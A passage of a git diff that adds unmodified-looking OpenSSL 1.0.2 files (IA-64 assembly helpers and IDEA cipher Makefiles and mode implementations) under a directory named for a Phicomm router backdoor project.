+OPENSSL_rdtsc:
+{ .mib;	mov			r8=ar.itc
+	br.ret.sptk.many	b0		};;
+.endp   OPENSSL_rdtsc#
+
+.global	OPENSSL_atomic_add#
+.proc	OPENSSL_atomic_add#
+.align	32
+OPENSSL_atomic_add:
+{ .mii;	ld4		r2=[r32]
+	nop.i		0
+	nop.i		0		};;
+.Lspin:
+{ .mii;	mov		ar.ccv=r2
+	add		r8=r2,r33
+	mov		r3=r2		};;
+{ .mmi;	mf;;
+	cmpxchg4.acq	r2=[r32],r8,ar.ccv
+	nop.i		0		};;
+{ .mib;	cmp.ne		p6,p0=r2,r3
+	nop.i		0
+(p6)	br.dpnt		.Lspin		};;
+{ .mib;	nop.m		0
+	sxt4		r8=r8
+	br.ret.sptk.many	b0	};;
+.endp	OPENSSL_atomic_add#
+
+// Returns a structure comprising pointer to the top of stack of
+// the caller and pointer beyond backing storage for the current
+// register frame. The latter is required, because it might be
+// insufficient to wipe backing storage for the current frame
+// (as this procedure does), one might have to go further, toward
+// higher addresses to reach for whole "retroactively" saved
+// context...
+.global	OPENSSL_wipe_cpu#
+.proc	OPENSSL_wipe_cpu#
+.align	32
+OPENSSL_wipe_cpu:
+	.prologue
+	.fframe	0
+	.save	ar.pfs,r2
+	.save	ar.lc,r3
+{ .mib;	alloc		r2=ar.pfs,0,96,0,96
+	mov		r3=ar.lc
+	brp.loop.imp	.L_wipe_top,.L_wipe_end-16
+					};;
+{ .mii;	mov		r9=ar.bsp
+	mov		r8=pr
+	mov		ar.lc=96	};;
+	.body
+{ .mii;	add		r9=96*8-8,r9
+	mov		ar.ec=1		};;
+
+// One can sweep double as fast, but then we can't quarantee
+// that backing storage is wiped...
+.L_wipe_top:
+{ .mfi;	st8		[r9]=r0,-8
+	mov		f127=f0
+	mov		r127=r0		}
+{ .mfb;	nop.m		0
+	nop.f		0
+	br.ctop.sptk	.L_wipe_top	};;
+.L_wipe_end:
+
+{ .mfi;	mov		r11=r0
+	mov		f6=f0
+	mov		r14=r0		}
+{ .mfi;	mov		r15=r0
+	mov		f7=f0
+	mov		r16=r0		}
+{ .mfi;	mov		r17=r0
+	mov		f8=f0
+	mov		r18=r0		}
+{ .mfi;	mov		r19=r0
+	mov		f9=f0
+	mov		r20=r0		}
+{ .mfi;	mov		r21=r0
+	mov		f10=f0
+	mov		r22=r0		}
+{ .mfi;	mov		r23=r0
+	mov		f11=f0
+	mov		r24=r0		}
+{ .mfi;	mov		r25=r0
+	mov		f12=f0
+	mov		r26=r0		}
+{ .mfi;	mov		r27=r0
+	mov		f13=f0
+	mov		r28=r0		}
+{ .mfi;	mov		r29=r0
+	mov		f14=f0
+	mov		r30=r0		}
+{ .mfi;	mov		r31=r0
+	mov		f15=f0
+	nop.i		0		}
+{ .mfi;	mov		f16=f0		}
+{ .mfi;	mov		f17=f0		}
+{ .mfi;	mov		f18=f0		}
+{ .mfi;	mov		f19=f0		}
+{ .mfi;	mov		f20=f0		}
+{ .mfi;	mov		f21=f0		}
+{ .mfi;	mov		f22=f0		}
+{ .mfi;	mov		f23=f0		}
+{ .mfi;	mov		f24=f0		}
+{ .mfi;	mov		f25=f0		}
+{ .mfi;	mov		f26=f0		}
+{ .mfi;	mov		f27=f0		}
+{ .mfi;	mov		f28=f0		}
+{ .mfi;	mov		f29=f0		}
+{ .mfi;	mov		f30=f0		}
+{ .mfi;	add		r9=96*8+8,r9
+	mov		f31=f0
+	mov		pr=r8,0x1ffff	}
+{ .mib;	mov		r8=sp
+	mov		ar.lc=r3
+	br.ret.sptk	b0		};;
+.endp	OPENSSL_wipe_cpu#
+
+.global	OPENSSL_cleanse#
+.proc	OPENSSL_cleanse#
+OPENSSL_cleanse:
+{ .mib;	cmp.eq		p6,p0=0,r33	    // len==0
+#if defined(_HPUX_SOURCE) && !defined(_LP64)
+	addp4		r32=0,r32
+#endif
+(p6)	br.ret.spnt	b0		};;
+{ .mib;	and		r2=7,r32
+	cmp.leu		p6,p0=15,r33	    // len>=15
+(p6)	br.cond.dptk	.Lot		};;
+
+.Little:
+{ .mib;	st1		[r32]=r0,1
+	cmp.ltu		p6,p7=1,r33	}  // len>1
+{ .mbb;	add		r33=-1,r33	   // len--
+(p6)	br.cond.dptk	.Little
+(p7)	br.ret.sptk.many	b0	};;
+
+.Lot:
+{ .mib;	cmp.eq		p6,p0=0,r2
+(p6)	br.cond.dptk	.Laligned	};;
+{ .mmi;	st1		[r32]=r0,1;;
+	and		r2=7,r32	}
+{ .mib;	add		r33=-1,r33
+	br		.Lot		};;
+
+.Laligned:
+{ .mmi;	st8		[r32]=r0,8
+	and		r2=-8,r33	    // len&~7
+	add		r33=-8,r33	};; // len-=8
+{ .mib;	cmp.ltu		p6,p0=8,r2	    // ((len+8)&~7)>8
+(p6)	br.cond.dptk	.Laligned	};;
+
+{ .mbb;	cmp.eq		p6,p7=r0,r33
+(p7)	br.cond.dpnt	.Little
+(p6)	br.ret.sptk.many	b0	};;
+.endp	OPENSSL_cleanse#
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/idea/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/idea/Makefile
new file mode 100644
index 0000000..8af0acd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/idea/Makefile
@@ -0,0 +1,89 @@
+#
+# OpenSSL/crypto/idea/Makefile
+#
+
+DIR=	idea
+TOP=	../..
+CC=	cc
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=ideatest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=i_cbc.c i_cfb64.c i_ofb64.c i_ecb.c i_skey.c
+LIBOBJ=i_cbc.o i_cfb64.o i_ofb64.o i_ecb.o i_skey.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= idea.h
+HEADER=	idea_lcl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+i_cbc.o: ../../include/openssl/idea.h ../../include/openssl/opensslconf.h
+i_cbc.o: i_cbc.c idea_lcl.h
+i_cfb64.o: ../../include/openssl/idea.h ../../include/openssl/opensslconf.h
+i_cfb64.o: i_cfb64.c idea_lcl.h
+i_ecb.o: ../../include/openssl/idea.h ../../include/openssl/opensslconf.h
+i_ecb.o: ../../include/openssl/opensslv.h i_ecb.c idea_lcl.h
+i_ofb64.o: ../../include/openssl/idea.h ../../include/openssl/opensslconf.h
+i_ofb64.o: i_ofb64.c idea_lcl.h
+i_skey.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+i_skey.o: ../../include/openssl/idea.h ../../include/openssl/opensslconf.h
+i_skey.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+i_skey.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+i_skey.o: ../../include/openssl/symhacks.h i_skey.c idea_lcl.h
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/idea/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/idea/Makefile.save
new file mode 100644
index 0000000..8af0acd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/idea/Makefile.save
@@ -0,0 +1,89 @@
+#
+# OpenSSL/crypto/idea/Makefile
+#
+
+DIR=	idea
+TOP=	../..
+CC=	cc
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=ideatest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=i_cbc.c i_cfb64.c i_ofb64.c i_ecb.c i_skey.c
+LIBOBJ=i_cbc.o i_cfb64.o i_ofb64.o i_ecb.o i_skey.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= idea.h
+HEADER=	idea_lcl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+i_cbc.o: ../../include/openssl/idea.h ../../include/openssl/opensslconf.h
+i_cbc.o: i_cbc.c idea_lcl.h
+i_cfb64.o: ../../include/openssl/idea.h ../../include/openssl/opensslconf.h
+i_cfb64.o: i_cfb64.c idea_lcl.h
+i_ecb.o: ../../include/openssl/idea.h ../../include/openssl/opensslconf.h
+i_ecb.o: ../../include/openssl/opensslv.h i_ecb.c idea_lcl.h
+i_ofb64.o: ../../include/openssl/idea.h ../../include/openssl/opensslconf.h
+i_ofb64.o: i_ofb64.c idea_lcl.h
+i_skey.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+i_skey.o: ../../include/openssl/idea.h ../../include/openssl/opensslconf.h
+i_skey.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+i_skey.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+i_skey.o: ../../include/openssl/symhacks.h i_skey.c idea_lcl.h
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/idea/i_cbc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/idea/i_cbc.c
new file mode 100644
index 0000000..950df98
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/idea/i_cbc.c
@@ -0,0 +1,171 @@
+/* crypto/idea/i_cbc.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS  SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/idea.h>
+#include "idea_lcl.h"
+
+void idea_cbc_encrypt(const unsigned char *in, unsigned char *out,
+                      long length, IDEA_KEY_SCHEDULE *ks, unsigned char *iv,
+                      int encrypt)
+{
+    register unsigned long tin0, tin1;
+    register unsigned long tout0, tout1, xor0, xor1;
+    register long l = length;
+    unsigned long tin[2];
+
+    if (encrypt) {
+        n2l(iv, tout0);
+        n2l(iv, tout1);
+        iv -= 8;
+        for (l -= 8; l >= 0; l -= 8) {
+            n2l(in, tin0);
+            n2l(in, tin1);
+            tin0 ^= tout0;
+            tin1 ^= tout1;
+            tin[0] = tin0;
+            tin[1] = tin1;
+            idea_encrypt(tin, ks);
+            tout0 = tin[0];
+            l2n(tout0, out);
+            tout1 = tin[1];
+            l2n(tout1, out);
+        }
+        if (l != -8) {
+            n2ln(in, tin0, tin1, l + 8);
+            tin0 ^= tout0;
+            tin1 ^= tout1;
+            tin[0] = tin0;
+            tin[1] = tin1;
+            idea_encrypt(tin, ks);
+            tout0 = tin[0];
+            l2n(tout0, out);
+            tout1 = tin[1];
+            l2n(tout1, out);
+        }
+        l2n(tout0, iv);
+        l2n(tout1, iv);
+    } else {
+        n2l(iv, xor0);
+        n2l(iv, xor1);
+        iv -= 8;
+        for (l -= 8; l >= 0; l -= 8) {
+            n2l(in, tin0);
+            tin[0] = tin0;
+            n2l(in, tin1);
+            tin[1] = tin1;
+            idea_encrypt(tin, ks);
+            tout0 = tin[0] ^ xor0;
+            tout1 = tin[1] ^ xor1;
+            l2n(tout0, out);
+            l2n(tout1, out);
+            xor0 = tin0;
+            xor1 = tin1;
+        }
+        if (l != -8) {
+            n2l(in, tin0);
+            tin[0] = tin0;
+            n2l(in, tin1);
+            tin[1] = tin1;
+            idea_encrypt(tin, ks);
+            tout0 = tin[0] ^ xor0;
+            tout1 = tin[1] ^ xor1;
+            l2nn(tout0, tout1, out, l + 8);
+            xor0 = tin0;
+            xor1 = tin1;
+        }
+        l2n(xor0, iv);
+        l2n(xor1, iv);
+    }
+    tin0 = tin1 = tout0 = tout1 = xor0 = xor1 = 0;
+    tin[0] = tin[1] = 0;
+}
+
+void idea_encrypt(unsigned long *d, IDEA_KEY_SCHEDULE *key)
+{
+    register IDEA_INT *p;
+    register unsigned long x1, x2, x3, x4, t0, t1, ul;
+
+    x2 = d[0];
+    x1 = (x2 >> 16);
+    x4 = d[1];
+    x3 = (x4 >> 16);
+
+    p = &(key->data[0][0]);
+
+    E_IDEA(0);
+    E_IDEA(1);
+    E_IDEA(2);
+    E_IDEA(3);
+    E_IDEA(4);
+    E_IDEA(5);
+    E_IDEA(6);
+    E_IDEA(7);
+
+    x1 &= 0xffff;
+    idea_mul(x1, x1, *p, ul);
+    p++;
+
+    t0 = x3 + *(p++);
+    t1 = x2 + *(p++);
+
+    x4 &= 0xffff;
+    idea_mul(x4, x4, *p, ul);
+
+    d[0] = (t0 & 0xffff) | ((x1 & 0xffff) << 16);
+    d[1] = (x4 & 0xffff) | ((t1 & 0xffff) << 16);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/idea/i_cfb64.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/idea/i_cfb64.c
new file mode 100644
index 0000000..a1547ed
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/idea/i_cfb64.c
@@ -0,0 +1,123 @@
+/* crypto/idea/i_cfb64.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/idea.h>
+#include "idea_lcl.h"
+
+/*
+ * The input and output encrypted as though 64bit cfb mode is being used.
+ * The extra state information to record how much of the 64bit block we have
+ * used is contained in *num;
+ */
+
+void idea_cfb64_encrypt(const unsigned char *in, unsigned char *out,
+                        long length, IDEA_KEY_SCHEDULE *schedule,
+                        unsigned char *ivec, int *num, int encrypt)
+{
+    register unsigned long v0, v1, t;
+    register int n = *num;
+    register long l = length;
+    unsigned long ti[2];
+    unsigned char *iv, c, cc;
+
+    iv = (unsigned char *)ivec;
+    if (encrypt) {
+        while (l--) {
+            if (n == 0) {
+                n2l(iv, v0);
+                ti[0] = v0;
+                n2l(iv, v1);
+                ti[1] = v1;
+                idea_encrypt((unsigned long *)ti, schedule);
+                iv = (unsigned char *)ivec;
+                t = ti[0];
+                l2n(t, iv);
+                t = ti[1];
+                l2n(t, iv);
+                iv = (unsigned char *)ivec;
+            }
+            c = *(in++) ^ iv[n];
+            *(out++) = c;
+            iv[n] = c;
+            n = (n + 1) & 0x07;
+        }
+    } else {
+        while (l--) {
+            if (n == 0) {
+                n2l(iv, v0);
+                ti[0] = v0;
+                n2l(iv, v1);
+                ti[1] = v1;
+                idea_encrypt((unsigned long *)ti, schedule);
+                iv = (unsigned char *)ivec;
+                t = ti[0];
+                l2n(t, iv);
+                t = ti[1];
+                l2n(t, iv);
+                iv = (unsigned char *)ivec;
+            }
+            cc = *(in++);
+            c = iv[n];
+            iv[n] = cc;
+            *(out++) = c ^ cc;
+            n = (n + 1) & 0x07;
+        }
+    }
+    v0 = v1 = ti[0] = ti[1] = t = c = cc = 0;
+    *num = n;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/idea/i_ecb.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/idea/i_ecb.c
new file mode 100644
index 0000000..a6b879a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/idea/i_ecb.c
@@ -0,0 +1,88 @@
+/* crypto/idea/i_ecb.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/idea.h>
+#include "idea_lcl.h"
+#include <openssl/opensslv.h>
+
+const char IDEA_version[] = "IDEA" OPENSSL_VERSION_PTEXT;
+
+const char *idea_options(void)
+{
+    if (sizeof(short) != sizeof(IDEA_INT))
+        return ("idea(int)");
+    else
+        return ("idea(short)");
+}
+
+void idea_ecb_encrypt(const unsigned char *in, unsigned char *out,
+                      IDEA_KEY_SCHEDULE *ks)
+{
+    unsigned long l0, l1, d[2];
+
+    n2l(in, l0);
+    d[0] = l0;
+    n2l(in, l1);
+    d[1] = l1;
+    idea_encrypt(d, ks);
+    l0 = d[0];
+    l2n(l0, out);
+    l1 = d[1];
+    l2n(l1, out);
+    l0 = l1 = d[0] = d[1] = 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/idea/i_ofb64.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/idea/i_ofb64.c
new file mode 100644
index 0000000..aa59488
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/idea/i_ofb64.c
@@ -0,0 +1,110 @@
+/* crypto/idea/i_ofb64.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
